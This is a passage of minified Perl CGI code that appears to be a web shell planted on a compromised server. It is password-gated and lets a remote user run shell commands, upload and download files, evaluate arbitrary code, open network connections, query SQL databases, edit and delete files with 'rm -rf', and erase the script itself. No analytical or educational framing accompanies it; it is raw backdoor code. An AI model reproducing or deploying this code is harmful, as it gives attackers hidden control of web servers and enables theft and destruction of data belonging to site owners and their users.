UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.< br >";print "File Path: $TargetName< br >";}else{print "Failed: $!< br >";}print "< /font >";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm 
$path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "hexdump"){&HEXDUMP;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "net_go1"){&NetGo1;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq 
"sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}